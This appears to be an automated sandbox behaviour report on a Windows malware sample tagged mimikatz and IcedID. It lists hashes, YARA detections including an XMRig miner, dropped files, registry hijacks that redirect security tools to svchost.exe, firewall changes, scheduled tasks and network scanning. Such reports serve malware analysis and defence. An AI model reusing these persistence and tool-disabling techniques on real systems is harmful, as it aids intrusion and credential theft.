Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
11-04-2024 06:44
Behavioral task
behavioral1
Sample
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
70b2d62d7c3e0f6eaeb1db24720637b9
-
SHA1
3e3105a8dc60536b511edf5f7d93ee1bd73a5eb0
-
SHA256
c43f1049e53282c7adeed911eefd446ab50b451d9c1c746c680c9bb75fb65a64
-
SHA512
a584f98afb0e4dfe845fbbc8db65478656837bdbc71651d8b041af83c2f786fbbae7314d1e5c708c4d0b1b16dca23ea029079f65f87ccfb66f466a3f35319ddb
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
euikgtl.exedescription pid process target process PID 3752 created 2204 3752 euikgtl.exe spoolsv.exe -
Contacts a large (30803) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 39 IoCs
Processes:
resource yara_rule behavioral2/memory/2808-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\itspapsg\euikgtl.exe UPX behavioral2/memory/852-7-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\lubbeisit\Corporate\vfshost.exe UPX behavioral2/memory/2552-135-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp UPX behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp UPX C:\Windows\Temp\lubbeisit\jgqtbilab.exe UPX behavioral2/memory/1856-140-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/1856-154-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX C:\Windows\Temp\tskqpisje\cktkgb.exe UPX behavioral2/memory/4524-161-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/3808-170-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/1616-174-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/1656-178-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4796-183-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/3600-188-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/1692-192-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/2728-195-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/2728-197-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/2244-201-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/3316-206-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/3216-210-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4472-215-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4348-219-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/3724-224-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/3800-228-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/1996-231-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/2316-234-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp UPX behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2808-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz C:\Windows\itspapsg\euikgtl.exe mimikatz behavioral2/memory/852-7-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
euikgtl.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts euikgtl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts euikgtl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 852 netsh.exe 2672 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
euikgtl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" euikgtl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe euikgtl.exe -
Executes dropped EXE 28 IoCs
Processes:
euikgtl.exeeuikgtl.exewpcap.exebqalurljg.exevfshost.exejgqtbilab.exexohudmc.exefkjvgk.execktkgb.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exeeuikgtl.exenstjgbafp.exeeuikgtl.exepid process 852 euikgtl.exe 3752 euikgtl.exe 4536 wpcap.exe 4032 bqalurljg.exe 2552 vfshost.exe 1856 jgqtbilab.exe 3480 xohudmc.exe 3620 fkjvgk.exe 4524 cktkgb.exe 3808 jgqtbilab.exe 1616 jgqtbilab.exe 1656 jgqtbilab.exe 4796 jgqtbilab.exe 3600 jgqtbilab.exe 1692 jgqtbilab.exe 2728 jgqtbilab.exe 2244 jgqtbilab.exe 3316 jgqtbilab.exe 3216 jgqtbilab.exe 4472 jgqtbilab.exe 4348 jgqtbilab.exe 3724 jgqtbilab.exe 3800 jgqtbilab.exe 1996 jgqtbilab.exe 2316 jgqtbilab.exe 3444 euikgtl.exe 1452 nstjgbafp.exe 232 euikgtl.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebqalurljg.exepid process 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4536 wpcap.exe 4032 bqalurljg.exe 4032 bqalurljg.exe 4032 bqalurljg.exe -
Processes:
resource yara_rule C:\Windows\lubbeisit\Corporate\vfshost.exe upx behavioral2/memory/2552-135-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp upx behavioral2/memory/2552-136-0x00007FF79B150000-0x00007FF79B23E000-memory.dmp upx C:\Windows\Temp\lubbeisit\jgqtbilab.exe upx behavioral2/memory/1856-140-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/1856-154-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx C:\Windows\Temp\tskqpisje\cktkgb.exe upx behavioral2/memory/4524-161-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/3808-170-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/1616-174-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/1656-178-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-181-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4796-183-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/3600-188-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/1692-192-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/2728-195-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/2728-197-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/2244-201-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-203-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/3316-206-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/3216-210-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-212-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4472-215-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4348-219-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-222-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/3724-224-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/3800-228-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/1996-231-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-232-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/2316-234-0x00007FF7AF960000-0x00007FF7AF9BB000-memory.dmp upx behavioral2/memory/4524-247-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4524-248-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4524-249-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4524-251-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4524-253-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx behavioral2/memory/4524-254-0x00007FF7AE390000-0x00007FF7AE4B0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
euikgtl.exexohudmc.exewpcap.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 euikgtl.exe File created C:\Windows\SysWOW64\fkjvgk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\fkjvgk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft euikgtl.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache euikgtl.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 euikgtl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A euikgtl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A euikgtl.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
euikgtl.exenstjgbafp.exe2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.execmd.exedescription ioc process File created C:\Windows\lubbeisit\UnattendGC\specials\ucl.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.exe euikgtl.exe File opened for modification C:\Windows\itspapsg\spoolsrv.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\Packet.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\xdvl-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\svschost.xml euikgtl.exe File opened for modification C:\Windows\lubbeisit\abkgigiey\Result.txt nstjgbafp.exe File created C:\Windows\lubbeisit\UnattendGC\specials\svschost.xml euikgtl.exe File opened for modification C:\Windows\itspapsg\docmicfg.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\bqalurljg.exe euikgtl.exe File created C:\Windows\itspapsg\svschost.xml euikgtl.exe File created C:\Windows\lubbeisit\Corporate\vfshost.exe euikgtl.exe File opened for modification C:\Windows\lubbeisit\abkgigiey\Packet.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\trfo-2.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\nstjgbafp.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\libxml2.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\ssleay32.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\Shellcode.ini euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\ip.txt euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\posh-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\trch-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\libeay32.dll euikgtl.exe File created C:\Windows\itspapsg\schoedcl.xml euikgtl.exe File created C:\Windows\lubbeisit\upbdrjv\swrpwe.exe euikgtl.exe File opened for modification C:\Windows\itspapsg\euikgtl.exe 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe File created C:\Windows\lubbeisit\abkgigiey\wpcap.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\AppCapture64.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\AppCapture32.dll euikgtl.exe File opened for modification C:\Windows\itspapsg\vimpcsvc.xml euikgtl.exe File created C:\Windows\itspapsg\euikgtl.exe 2024-04-11_70b2d62d7c3e0f6eaeb1db24720637b9_hacktools_icedid_mimikatz.exe File created C:\Windows\lubbeisit\UnattendGC\specials\crli-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\tibe-2.dll euikgtl.exe File created C:\Windows\itspapsg\spoolsrv.xml euikgtl.exe File created C:\Windows\lubbeisit\Corporate\mimilib.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\spoolsrv.xml euikgtl.exe File created C:\Windows\lubbeisit\Corporate\mimidrv.sys euikgtl.exe File created C:\Windows\ime\euikgtl.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\zlib1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\svschost.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\docmicfg.exe euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\docmicfg.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\vimpcsvc.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\cnli-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\coli-0.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\exma-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\tucl-1.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\svschost.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\schoedcl.xml euikgtl.exe File created C:\Windows\itspapsg\vimpcsvc.xml euikgtl.exe File created C:\Windows\itspapsg\docmicfg.xml euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\scan.bat euikgtl.exe File created C:\Windows\lubbeisit\abkgigiey\wpcap.dll euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\vimpcsvc.xml euikgtl.exe File created C:\Windows\lubbeisit\UnattendGC\specials\spoolsrv.xml euikgtl.exe File opened for modification C:\Windows\lubbeisit\Corporate\log.txt cmd.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 4184 sc.exe 1972 sc.exe 4768 sc.exe 2832 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\itspapsg\euikgtl.exe nsis_installer_2 C:\Windows\lubbeisit\abkgigiey\wpcap.exe nsis_installer_1 C:\Windows\lubbeisit\abkgigiey\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2732 schtasks.exe 2528 schtasks.exe 4496 schtasks.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
euikgtl.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exejgqtbilab.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" euikgtl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" jgqtbilab.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" 